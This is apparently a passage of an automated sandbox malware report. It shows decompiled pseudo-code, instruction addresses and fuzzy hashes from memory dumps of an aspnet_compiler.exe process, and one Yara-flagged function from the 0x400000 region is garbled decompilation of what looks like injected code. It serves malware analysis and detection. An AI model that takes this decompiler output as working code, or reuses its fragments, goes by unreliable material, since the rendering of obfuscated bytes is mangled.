                          0x0141c1a4
                          0x0141c1aa
                          0x0141c1b3
                          0x0141c265
                          0x0141c26c
                          0x0141c26c
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                          • Instruction ID: a3cb747ccdf53d73ad800aa90ce11a8a2e8cba8712a7d2ae789f7630eb07445a
                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                          • Instruction Fuzzy Hash: 76311671A81547BBD715EBB6C890BEAF764BF62204F04416FC41C87365DB386A0ACBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E01477016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                          				signed int _v8;
                          				char _v588;
                          				intOrPtr _v592;
                          				intOrPtr _v596;
                          				signed short* _v600;
                          				char _v604;
                          				short _v606;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed short* _t55;
                          				void* _t56;
                          				signed short* _t58;
                          				signed char* _t61;
                          				char* _t68;
                          				void* _t69;
                          				void* _t71;
                          				void* _t72;
                          				signed int _t75;
                          
                          				_t64 = __edx;
                          				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                          				_v8 =  *0x14ed360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                          				_t55 = _a16;
                          				_v606 = __ecx;
                          				_t71 = 0;
                          				_t58 = _a12;
                          				_v596 = __edx;
                          				_v600 = _t58;
                          				_t68 =  &_v588;
                          				if(_t58 != 0) {
                          					_t71 = ( *_t58 & 0x0000ffff) + 2;
                          					if(_t55 != 0) {
                          						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                          					}
                          				}
                          				_t8 = _t71 + 0x2a; // 0x28
                          				_t33 = _t8;
                          				_v592 = _t8;
                          				if(_t71 <= 0x214) {
                          					L6:
                          					 *((short*)(_t68 + 6)) = _v606;
                          					if(_t64 != 0xffffffff) {
                          						asm("cdq");
                          						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                          						 *((char*)(_t68 + 0x28)) = _a4;
                          						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                          						 *((char*)(_t68 + 0x29)) = _a8;
                          						if(_t71 != 0) {
                          							_t22 = _t68 + 0x2a; // 0x2a
                          							_t64 = _t22;
                          							E01476B4C(_t58, _t22, _t71,  &_v604);
                          							if(_t55 != 0) {
                          								_t25 = _v604 + 0x2a; // 0x2a
                          								_t64 = _t25 + _t68;
                          								E01476B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                          							}
                          							if(E01417D50() == 0) {
                          								_t61 = 0x7ffe0384;
                          							} else {
                          								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          							}
                          							_push(_t68);
                          							_push(_v592 + 0xffffffe0);
                          							_push(0x402);
                          							_push( *_t61 & 0x000000ff);
                          							E01439AE0();
                          						}
                          					}
                          					_t35 =  &_v588;
                          					if( &_v588 != _t68) {
                          						_t35 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                          					}
                          					L16:
                          					_pop(_t69);
                          					_pop(_t72);
                          					_pop(_t56);
                          					return E0143B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                          				}
                          				_t68 = L01414620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                          				if(_t68 == 0) {
                          					goto L16;
                          				} else {
                          					_t58 = _v600;
                          					_t64 = _v596;
                          					goto L6;
                          				}
                          			}






















                          0x01477016
                          0x0147701e
                          0x0147702b
                          0x01477033
                          0x01477037
                          0x0147703c
                          0x0147703e
                          0x01477041
                          0x01477045
                          0x0147704a
                          0x01477050
                          0x01477055
                          0x0147705a
                          0x01477062
                          0x01477062
                          0x0147705a
                          0x01477064
                          0x01477064
                          0x01477067
                          0x01477071
                          0x01477096
                          0x0147709b
                          0x014770a2
                          0x014770a6
                          0x014770a7
                          0x014770ad
                          0x014770b3
                          0x014770b6
                          0x014770bb
                          0x014770c3
                          0x014770c3
                          0x014770c6
                          0x014770cd
                          0x014770dd
                          0x014770e0
                          0x014770e2
                          0x014770e2
                          0x014770ee
                          0x01477101
                          0x014770f0
                          0x014770f9
                          0x014770f9
                          0x0147710a
                          0x0147710e
                          0x01477112
                          0x01477117
                          0x01477118
                          0x01477118
                          0x014770bb
                          0x0147711d
                          0x01477123
                          0x01477131
                          0x01477131
                          0x01477136
                          0x0147713d
                          0x0147713e
                          0x0147713f
                          0x0147714a
                          0x0147714a
                          0x01477084
                          0x01477088
                          0x00000000
                          0x0147708e
                          0x0147708e
                          0x01477092
                          0x00000000
                          0x01477092

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc007f3044028a4428e02a4a9047b92b36f57703fd20714d6d08a154055cf9b3
                          • Instruction ID: cb9f8851b508d77de87d939ebbb802a111c22930e8d23a063636d01a254db1b6
                          • Opcode Fuzzy Hash: cc007f3044028a4428e02a4a9047b92b36f57703fd20714d6d08a154055cf9b3
                          • Instruction Fuzzy Hash: BA31E6726047919BC321DF28C844AABB7E5FFD8700F054A2EF995877A0E730E904CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 21%
                          			E0040C3A9(signed int __eax, signed int __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, void* __fp0) {
                          				signed char _t42;
                          				intOrPtr _t43;
                          				signed int _t49;
                          				signed int _t56;
                          				signed int _t57;
                          				signed int _t59;
                          				intOrPtr _t60;
                          				signed int _t61;
                          				void* _t64;
                          				void* _t69;
                          				intOrPtr* _t76;
                          				void* _t80;
                          				signed int _t81;
                          				void* _t85;
                          				void* _t87;
                          
                          				_t80 = __esi;
                          				_t76 = __edi;
                          				_t69 = __edx;
                          				_t64 = __ecx;
                          				_t59 = __ebx;
                          				_t40 = __eax;
                          				asm("aam 0xd2");
                          				if(__edi <=  *[cs:edi+ecx*4-0x71bbe8cc]) {
                          					_t42 = (_t40 | 0x035be939) ^ 0x06cadf8e;
                          					_t81 = _t80 - 1;
                          					__eflags = _t81;
                          					_push(ss);
                          					if(_t81 <= 0) {
                          						asm("in al, 0x96");
                          						asm("out dx, eax");
                          						asm("lodsd");
                          						_pop(_t85);
                          						_t42 = _t59 & 0x0000006f;
                          						asm("outsb");
                          						asm("arpl di, dx");
                          						asm("repne jmp dword 0xd89e:0xdb263107");
                          					}
                          					__eflags = _t85 - 1;
                          					_pop(_t87);
                          					asm("movsb");
                          					_t60 = _t69 - 1;
                          					if(_t85 - 1 >= 0) {
                          						_t43 =  *((intOrPtr*)(_t42 + 8));
                          						_push(_t81);
                          						_push(_t76);
                          						_t76 = 0;
                          						__eflags = _t43 - 8;
                          						if(_t43 != 8) {
                          							__eflags = _t43 - 0xd;
                          							if(_t43 != 0xd) {
                          								__eflags = _t43 - 9;
                          								if(_t43 != 9) {
                          									__eflags = _t43 - 0x1b;
                          									if(_t43 != 0x1b) {
                          										__eflags = _t43 - 0x12;
                          										if(_t43 != 0x12) {
                          											__eflags = _t43 + 0xffffff90 - 0x17;
                          											if(_t43 + 0xffffff90 > 0x17) {
                          												goto L22;
                          											} else {
                          												return 1;
                          											}
                          										} else {
                          											_t81 =  *(_t87 + 8);
                          											E0041A0D0(_t81 + 0x3fe4, _t81 + 0x4c7c, 0xc);
                          											 *(_t81 + 0x3ebc) = 5;
                          											goto L20;
                          										}
                          									} else {
                          										_t81 =  *(_t87 + 8);
                          										E0041A0D0(_t81 + 0x3fe4, _t81 + 0x4c64, 0xc);
                          										 *(_t81 + 0x3ebc) = 5;
                          										goto L20;
                          									}
                          								} else {
                          									_t81 =  *(_t87 + 8);
                          									E0041A0D0(_t81 + 0x3fe4, _t81 + 0x4c94, 0xc);
                          									 *(_t81 + 0x3ebc) = 5;
                          									goto L20;
                          								}
                          							} else {
                          								_t81 =  *(_t87 + 8);
                          								_push(0x10);
                          								_push(_t81 + 0x4cac);
                          								_t64 = _t81 + 0x3fe4;
                          								_push(_t64);
                          								goto L17;
                          							}
                          						} else {
                          							_t81 =  *(_t87 + 8);
                          							_push(0x10);
                          							_t64 = _t81 + 0x4cc4;
                          							_push(_t64);
                          							_push(_t81 + 0x3fe4);
                          							L17:
                          							_t56 = E0041A0D0();
                          							goto L18;
                          						}
                          					} else {
                          						_t56 = _t42 - 1;
                          						__eflags = _t56;
                          						asm("les ebp, [ecx]");
                          						if(__eflags != 0) {
                          							L19:
                          							 *_t76 =  *_t76 + _t56;
                          							 *_t56 =  *_t56 + _t56;
                          							_t16 = _t60 + 0x3ebc86;
                          							 *_t16 =  *(_t60 + 0x3ebc86) + _t64;
                          							__eflags =  *_t16;
                          							L20:
                          							_t49 =  *(_t81 + 0x3ebc);
                          							_push(4);
                          							_push(_t81 + 0x3edc);
                          							_push(_t81 + 0x3fe4 + _t49 * 2);
                          							_t76 = 1;
                          							goto L21;
                          						} else {
                          							if(__eflags > 0) {
                          								L18:
                          								_t61 = _t60 + _t56;
                          								__eflags = _t61;
                          								_t13 = _t81 + _t76 + 0x70000;
                          								_t60 =  *_t13;
                          								 *_t13 = _t61;
                          								goto L19;
                          							} else {
                          								__eflags = _t64 + 1;
                          								asm("movsb");
                          								asm("hlt");
                          								asm("adc dl, ch");
                          								asm("std");
                          								_pop(es);
                          								 *0x60 = ds;
                          								if(_t64 + 1 > 0) {
                          									L21:
                          									 *_t49 =  *_t49 + _t49;
                          									E0041A0D0();
                          									_t23 = _t81 + 0x3ebc;
                          									 *_t23 =  *(_t81 + 0x3ebc) + 2;
                          									__eflags =  *_t23;
                          									L0040C170(_t81, 2);
                          									L22:
                          									return _t76;
                          								} else {
                          									_t57 = _t56 | 0xa81a90d2;
                          									__eflags = _t57;
                          									return _t57;
                          								}
                          							}
                          						}
                          					}
                          				} else {
                          					asm("popfd");
                          					asm("rcr dl, 1");
                          					asm("insd");
                          					asm("iretd");
                          					asm("aas");
                          					_push(__ecx);
                          					if(__eflags >= 0) {
                          						return __eax;
                          					} else {
                          						asm("aam 0xed");
                          						__eflags =  *[ss:ebx+0x70] - __dl;
                          						_t7 = __eax;
                          						__eax = __esi;
                          						__esi = _t7;
                          						asm("cli");
                          						if ( *[ss:ebx+0x70] - __dl >= 0) goto L2;
                          					}
                          				}
                          			}


















                          0x0040c3a9
                          0x0040c3a9
                          0x0040c3a9
                          0x0040c3a9
                          0x0040c3a9
                          0x0040c3a9
                          0x0040c3a9
                          0x0040c3be
                          0x0040c3dd
                          0x0040c3e2
                          0x0040c3e2
                          0x0040c3e5
                          0x0040c3e6
                          0x0040c3e8
                          0x0040c3ea
                          0x0040c3ec
                          0x0040c3ed
                          0x0040c3ee
                          0x0040c3f0
                          0x0040c3f1
                          0x0040c3f3
                          0x0040c3f3
                          0x0040c3fd
                          0x0040c3fe
                          0x0040c3ff
                          0x0040c401
                          0x0040c405
                          0x0040c436
                          0x0040c439
                          0x0040c43a
                          0x0040c43b
                          0x0040c43d
                          0x0040c440
                          0x0040c4a0
                          0x0040c4a3
                          0x0040c4ba
                          0x0040c4bd
                          0x0040c4e3
                          0x0040c4e6
                          0x0040c50f
                          0x0040c512
                          0x0040c53e
                          0x0040c541
                          0x00000000
                          0x0040c547
                          0x0040c54f
                          0x0040c54f
                          0x0040c514
                          0x0040c514
                          0x0040c527
                          0x0040c52c
                          0x00000000
                          0x0040c52c
                          0x0040c4e8
                          0x0040c4e8
                          0x0040c4fb
                          0x0040c500
                          0x00000000
                          0x0040c500
                          0x0040c4bf
                          0x0040c4bf
                          0x0040c4d2
                          0x0040c4d7
                          0x00000000
                          0x0040c4d7
                          0x0040c4a5
                          0x0040c4a5
                          0x0040c4a8
                          0x0040c4b0
                          0x0040c4b1
                          0x0040c4b7
                          0x00000000
                          0x0040c4b7
                          0x0040c442
                          0x0040c442
                          0x0040c445
                          0x0040c447
                          0x0040c44d
                          0x0040c454
                          0x0040c455
                          0x0040c455
                          0x00000000
                          0x0040c455
                          0x0040c407
                          0x0040c407
                          0x0040c407
                          0x0040c408
                          0x0040c40a
                          0x0040c45f
                          0x0040c45f
                          0x0040c461
                          0x0040c463
                          0x0040c463
                          0x0040c463
                          0x0040c464
                          0x0040c464
                          0x0040c46d
                          0x0040c475
                          0x0040c47d
                          0x0040c47e
                          0x00000000
                          0x0040c40c
                          0x0040c40c
                          0x0040c457
                          0x0040c459
                          0x0040c459
                          0x0040c45b
                          0x0040c45b
                          0x0040c45b
                          0x00000000
                          0x0040c40f
                          0x0040c410
                          0x0040c411
                          0x0040c412
                          0x0040c416
                          0x0040c418
                          0x0040c419
                          0x0040c41a
                          0x0040c41c
                          0x0040c481
                          0x0040c481
                          0x0040c483
                          0x0040c488
                          0x0040c488
                          0x0040c488
                          0x0040c492
                          0x0040c49a
                          0x0040c49f
                          0x0040c41e
                          0x0040c41e
                          0x0040c41e
                          0x0040c42d
                          0x0040c42d
                          0x0040c41c
                          0x0040c40c
                          0x0040c40a
                          0x0040c3c0
                          0x0040c3c0
                          0x0040c3c1
                          0x0040c3c3
                          0x0040c3c4
                          0x0040c3c5
                          0x0040c3c6
                          0x0040c3c7
                          0x0040c376
                          0x0040c3c9
                          0x0040c3c9
                          0x0040c3cb
                          0x0040c3cf
                          0x0040c3cf
                          0x0040c3cf
                          0x0040c3d0
                          0x0040c3d3
                          0x0040c3d4
                          0x0040c3c7

                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7cb755d2f85029b419446b6b4299797f23018bc7482f25b28677d9f8833497e4
                          • Instruction ID: 6859c2f313fbfa8d8615b813ff60d40a64ca52869d9c67f99bed2a5d73f6fb48
                          • Opcode Fuzzy Hash: 7cb755d2f85029b419446b6b4299797f23018bc7482f25b28677d9f8833497e4
                          • Instruction Fuzzy Hash: C1219B736197808BC3139F24DC80AE6F7B4FB86310F0847AFD14A97193D635A61C8BA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E014A3D40(intOrPtr __ecx, char* __edx) {
                          				signed int _v8;
                          				char* _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				signed char _v24;
                          				char _v28;
                          				char _v29;
                          				intOrPtr* _v32;
                          				char _v36;
                          				char _v37;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed char _t34;
                          				intOrPtr* _t37;
                          				intOrPtr* _t42;
                          				intOrPtr* _t47;
                          				intOrPtr* _t48;
                          				intOrPtr* _t49;
                          				char _t51;
                          				void* _t52;
                          				intOrPtr* _t53;
                          				char* _t55;
                          				char _t59;
                          				char* _t61;
                          				intOrPtr* _t64;
                          				void* _t65;
                          				char* _t67;
                          				void* _t68;
                          				signed int _t70;
                          
                          				_t62 = __edx;
                          				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                          				_v8 =  *0x14ed360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                          				_t34 =  &_v28;
                          				_v20 = __ecx;
                          				_t67 = __edx;
                          				_v24 = _t34;
                          				_t51 = 0;
                          				_v12 = __edx;
                          				_v29 = 0;
                          				_v28 = _t34;
                          				E01412280(_t34, 0x14e8a6c);
                          				_t64 =  *0x14e5768; // 0x776f5768
                          				if(_t64 != 0x14e5768) {
                          					while(1) {
                          						_t8 = _t64 + 8; // 0x776f5770
                          						_t42 = _t8;
                          						_t53 = _t64;
                          						 *_t42 =  *_t42 + 1;
                          						_v16 = _t42;
                          						E0140FFB0(_t53, _t64, 0x14e8a6c);
                          						 *0x14eb1e0(_v24, _t67);
                          						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                          							_v37 = 1;
                          						}
                          						E01412280(_t45, 0x14e8a6c);
                          						_t47 = _v28;
                          						_t64 =  *_t64;
                          						 *_t47 =  *_t47 - 1;
                          						if( *_t47 != 0) {
                          							goto L8;
                          						}
                          						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                          							L10:
                          							_push(3);
                          							asm("int 0x29");
                          						} else {
                          							_t48 =  *((intOrPtr*)(_t53 + 4));
                          							if( *_t48 != _t53) {
                          								goto L10;
                          							} else {
                          								 *_t48 = _t64;
                          								_t61 =  &_v36;
                          								 *((intOrPtr*)(_t64 + 4)) = _t48;
                          								_t49 = _v32;
                          								if( *_t49 != _t61) {
                          									goto L10;
                          								} else {
                          									 *_t53 = _t61;
                          									 *((intOrPtr*)(_t53 + 4)) = _t49;
                          									 *_t49 = _t53;
                          									_v32 = _t53;
                          									goto L8;
                          								}
                          							}
                          						}
                          						L11:
                          						_t51 = _v29;
                          						goto L12;
                          						L8:
                          						if(_t64 != 0x14e5768) {
                          							_t67 = _v20;
                          							continue;
                          						}
                          						goto L11;
                          					}
                          				}
                          				L12:
                          				E0140FFB0(_t51, _t64, 0x14e8a6c);
                          				while(1) {
                          					_t37 = _v28;
                          					_t55 =  &_v28;
                          					if(_t37 == _t55) {
                          						break;
                          					}
                          					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                          						goto L10;
                          					} else {
                          						_t59 =  *_t37;
                          						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                          							goto L10;
                          						} else {
                          							_t62 =  &_v28;
                          							_v28 = _t59;
                          							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                          							continue;
                          						}
                          					}
                          					L18:
                          				}
                          				_pop(_t65);
                          				_pop(_t68);
                          				_pop(_t52);
                          				return E0143B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                          				goto L18;
                          			}

































                          0x014a3d40
                          0x014a3d48
                          0x014a3d52
                          0x014a3d59
                          0x014a3d5d
                          0x014a3d61
                          0x014a3d63
                          0x014a3d67
                          0x014a3d69
                          0x014a3d72
                          0x014a3d76
                          0x014a3d7a
                          0x014a3d7f
                          0x014a3d8b
                          0x014a3d91
                          0x014a3d91
                          0x014a3d91
                          0x014a3d94
                          0x014a3d96
                          0x014a3d9d
                          0x014a3da1
                          0x014a3db0
                          0x014a3dba
                          0x014a3dbc
                          0x014a3dbc
                          0x014a3dc6
                          0x014a3dcb
                          0x014a3dcf
                          0x014a3dd1
                          0x014a3dd4
                          0x00000000
                          0x00000000
                          0x014a3dd9
                          0x014a3e0c
                          0x014a3e0c
                          0x014a3e0f
                          0x014a3ddb
                          0x014a3ddb
                          0x014a3de0
                          0x00000000
                          0x014a3de2
                          0x014a3de2
                          0x014a3de4
                          0x014a3de8
                          0x014a3deb
                          0x014a3df1
                          0x00000000
                          0x014a3df3
                          0x014a3df3
                          0x014a3df5
                          0x014a3df8
                          0x014a3dfa
                          0x00000000
                          0x014a3dfa
                          0x014a3df1
                          0x014a3de0
                          0x014a3e11
                          0x014a3e11
                          0x00000000
                          0x014a3dfe
                          0x014a3e04
                          0x014a3e06
                          0x00000000
                          0x014a3e06
                          0x00000000
                          0x014a3e04
                          0x014a3d91
                          0x014a3e15
                          0x014a3e1a
                          0x014a3e1f
                          0x014a3e1f
                          0x014a3e23
                          0x014a3e29
                          0x00000000
                          0x00000000
                          0x014a3e2e
                          0x00000000
                          0x014a3e30
                          0x014a3e30
                          0x014a3e35
                          0x00000000
                          0x014a3e37
                          0x014a3e3e
                          0x014a3e42
                          0x014a3e48
                          0x014a3e4e
                          0x00000000
                          0x014a3e4e
                          0x014a3e35
                          0x00000000
                          0x014a3e2e
                          0x014a3e5b
                          0x014a3e5c
                          0x014a3e5d
                          0x014a3e68
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b3025e7999f4f9dbfcd090e80ddcb67b17448c78e94b0ab5c869ce96a574650
                          • Instruction ID: 17a1cbd76a639ecd0c2cf99bee0752f76eb96934688e01a8c120d7d7e1074a11
                          • Opcode Fuzzy Hash: 8b3025e7999f4f9dbfcd090e80ddcb67b17448c78e94b0ab5c869ce96a574650
                          • Instruction Fuzzy Hash: 66317771549302CFCB10DF29C48491BBBE1FBA5615F45496FE5988B361E730ED05CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E0142A70E(intOrPtr* __ecx, char* __edx) {
                          				unsigned int _v8;
                          				intOrPtr* _v12;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* _t16;
                          				intOrPtr _t17;
                          				intOrPtr _t28;
                          				char* _t33;
                          				intOrPtr _t37;
                          				intOrPtr _t38;
                          				void* _t50;
                          				intOrPtr _t52;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t52 =  *0x14e7b10; // 0x0
                          				_t33 = __edx;
                          				_t48 = __ecx;
                          				_v12 = __ecx;
                          				if(_t52 == 0) {
                          					 *0x14e7b10 = 8;
                          					 *0x14e7b14 = 0x14e7b0c;
                          					 *0x14e7b18 = 1;
                          					L6:
                          					_t2 = _t52 + 1; // 0x1
                          					E0142A990(0x14e7b10, _t2, 7);
                          					asm("bts ecx, eax");
                          					 *_t48 = _t52;
                          					 *_t33 = 1;
                          					L3:
                          					_t16 = 0;
                          					L4:
                          					return _t16;
                          				}
                          				_t17 = L0142A840(__edx, __ecx, __ecx, _t52, 0x14e7b10, 1, 0);
                          				if(_t17 == 0xffffffff) {
                          					_t37 =  *0x14e7b10; // 0x0
                          					_t3 = _t37 + 0x27; // 0x27
                          					__eflags = _t3 >> 5 -  *0x14e7b18; // 0x0
                          					if(__eflags > 0) {
                          						_t38 =  *0x14e7b9c; // 0x0
                          						_t4 = _t52 + 0x27; // 0x27
                          						_v8 = _t4 >> 5;
                          						_t50 = L01414620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                          						__eflags = _t50;
                          						if(_t50 == 0) {
                          							_t16 = 0xc0000017;
                          							goto L4;
                          						}
                          						 *0x14e7b18 = _v8;
                          						_t8 = _t52 + 7; // 0x7
                          						E0143F3E0(_t50,  *0x14e7b14, _t8 >> 3);
                          						_t28 =  *0x14e7b14; // 0x0
                          						__eflags = _t28 - 0x14e7b0c;
                          						if(_t28 != 0x14e7b0c) {
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                          						}
                          						_t9 = _t52 + 8; // 0x8
                          						 *0x14e7b14 = _t50;
                          						_t48 = _v12;
                          						 *0x14e7b10 = _t9;
                          						goto L6;
                          					}
                          					 *0x14e7b10 = _t37 + 8;
                          					goto L6;
                          				}
                          				 *__ecx = _t17;
                          				 *_t33 = 0;
                          				goto L3;
                          			}
















                          0x0142a713
                          0x0142a714
                          0x0142a717
                          0x0142a71d
                          0x0142a720
                          0x0142a722
                          0x0142a727
                          0x0142a74a
                          0x0142a754
                          0x0142a75e
                          0x0142a768
                          0x0142a76a
                          0x0142a773
                          0x0142a78b
                          0x0142a790
                          0x0142a792
                          0x0142a741
                          0x0142a741
                          0x0142a743
                          0x0142a749
                          0x0142a749
                          0x0142a732
                          0x0142a73a
                          0x0142a797
                          0x0142a79d
                          0x0142a7a3
                          0x0142a7a9
                          0x0142a7b6
                          0x0142a7bc
                          0x0142a7ca
                          0x0142a7e0
                          0x0142a7e2
                          0x0142a7e4
                          0x01469bf2
                          0x00000000
                          0x01469bf2
                          0x0142a7ed
                          0x0142a7f2
                          0x0142a800
                          0x0142a805
                          0x0142a80d
                          0x0142a812
                          0x01469c08
                          0x01469c08
                          0x0142a818
                          0x0142a81b
                          0x0142a821
                          0x0142a824
                          0x00000000
                          0x0142a824
                          0x0142a7ae
                          0x00000000
                          0x0142a7ae
                          0x0142a73c
                          0x0142a73e
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0d64f11bc4d653b15fd921180a16698fa6695ededea9f3763516d86128a062f
                          • Instruction ID: e2c79cee6298286af786b27eb8922dd778db6101dbb53c3318db9e27980bb511
                          • Opcode Fuzzy Hash: a0d64f11bc4d653b15fd921180a16698fa6695ededea9f3763516d86128a062f
                          • Instruction Fuzzy Hash: B931C1B1600211DFCB21CF08E880F167BF9FB9476AF640A5BE6058B769D3B09942CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E014261A0(signed int* __ecx) {
                          				intOrPtr _v8;
                          				char _v12;
                          				intOrPtr* _v16;
                          				intOrPtr _v20;
                          				intOrPtr _t30;
                          				intOrPtr _t31;
                          				void* _t32;
                          				intOrPtr _t33;
                          				intOrPtr _t37;
                          				intOrPtr _t49;
                          				signed int _t51;
                          				intOrPtr _t52;
                          				signed int _t54;
                          				void* _t59;
                          				signed int* _t61;
                          				intOrPtr* _t64;
                          
                          				_t61 = __ecx;
                          				_v12 = 0;
                          				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                          				_v16 = __ecx;
                          				_v8 = 0;
                          				if(_t30 == 0) {
                          					L6:
                          					_t31 = 0;
                          					L7:
                          					return _t31;
                          				}
                          				_t32 = _t30 + 0x5d8;
                          				if(_t32 == 0) {
                          					goto L6;
                          				}
                          				_t59 = _t32 + 0x30;
                          				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                          					goto L6;
                          				}
                          				if(__ecx != 0) {
                          					 *((intOrPtr*)(__ecx)) = 0;
                          					 *((intOrPtr*)(__ecx + 4)) = 0;
                          				}
                          				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                          					_t51 =  *(_t32 + 0x10);
                          					_t33 = _t32 + 0x10;
                          					_v20 = _t33;
                          					_t54 =  *(_t33 + 4);
                          					if((_t51 | _t54) == 0) {
                          						_t37 = E01425E50(0x13d67cc, 0, 0,  &_v12);
                          						if(_t37 != 0) {
                          							goto L6;
                          						}
                          						_t52 = _v8;
                          						asm("lock cmpxchg8b [esi]");
                          						_t64 = _v16;
                          						_t49 = _t37;
                          						_v20 = 0;
                          						if(_t37 == 0) {
                          							if(_t64 != 0) {
                          								 *_t64 = _v12;
                          								 *((intOrPtr*)(_t64 + 4)) = _t52;
                          							}
                          							E014C9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                          							_t31 = 1;
                          							goto L7;
                          						}
                          						E013FF7C0(_t52, _v12, _t52, 0);
                          						if(_t64 != 0) {
                          							 *_t64 = _t49;
                          							 *((intOrPtr*)(_t64 + 4)) = _v20;
                          						}
                          						L12:
                          						_t31 = 1;
                          						goto L7;
                          					}
                          					if(_t61 != 0) {
                          						 *_t61 = _t51;
                          						_t61[1] = _t54;
                          					}
                          					goto L12;
                          				} else {
                          					goto L6;
                          				}
                          			}



















                          0x014261b3
                          0x014261b5
                          0x014261bd
                          0x014261c3
                          0x014261c7
                          0x014261d2
                          0x014261ff
                          0x014261ff
                          0x01426201
                          0x01426207
                          0x01426207
                          0x014261d4
                          0x014261d9
                          0x00000000
                          0x00000000
                          0x014261df
                          0x014261e2
                          0x00000000
                          0x00000000
                          0x014261e6
                          0x014261e8
                          0x014261ee
                          0x014261ee
                          0x014261f9
                          0x0146762f
                          0x01467632
                          0x01467635
                          0x01467639
                          0x01467640
                          0x0146766e
                          0x01467675
                          0x00000000
                          0x00000000
                          0x01467681
                          0x01467689
                          0x0146768d
                          0x01467691
                          0x01467695
                          0x01467699
                          0x014676af
                          0x014676b5
                          0x014676b7
                          0x014676b7
                          0x014676d7
                          0x014676dc
                          0x00000000
                          0x014676dc
                          0x014676a2
                          0x014676a9
                          0x01467651
                          0x01467653
                          0x01467653
                          0x01467656
                          0x01467656
                          0x00000000
                          0x01467656
                          0x01467644
                          0x01467646
                          0x01467648
                          0x01467648
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0a291524e9b21f76d22cfc6f8e1a0b46badb7ab2a05df3e0ef0450ce2d9f68ba
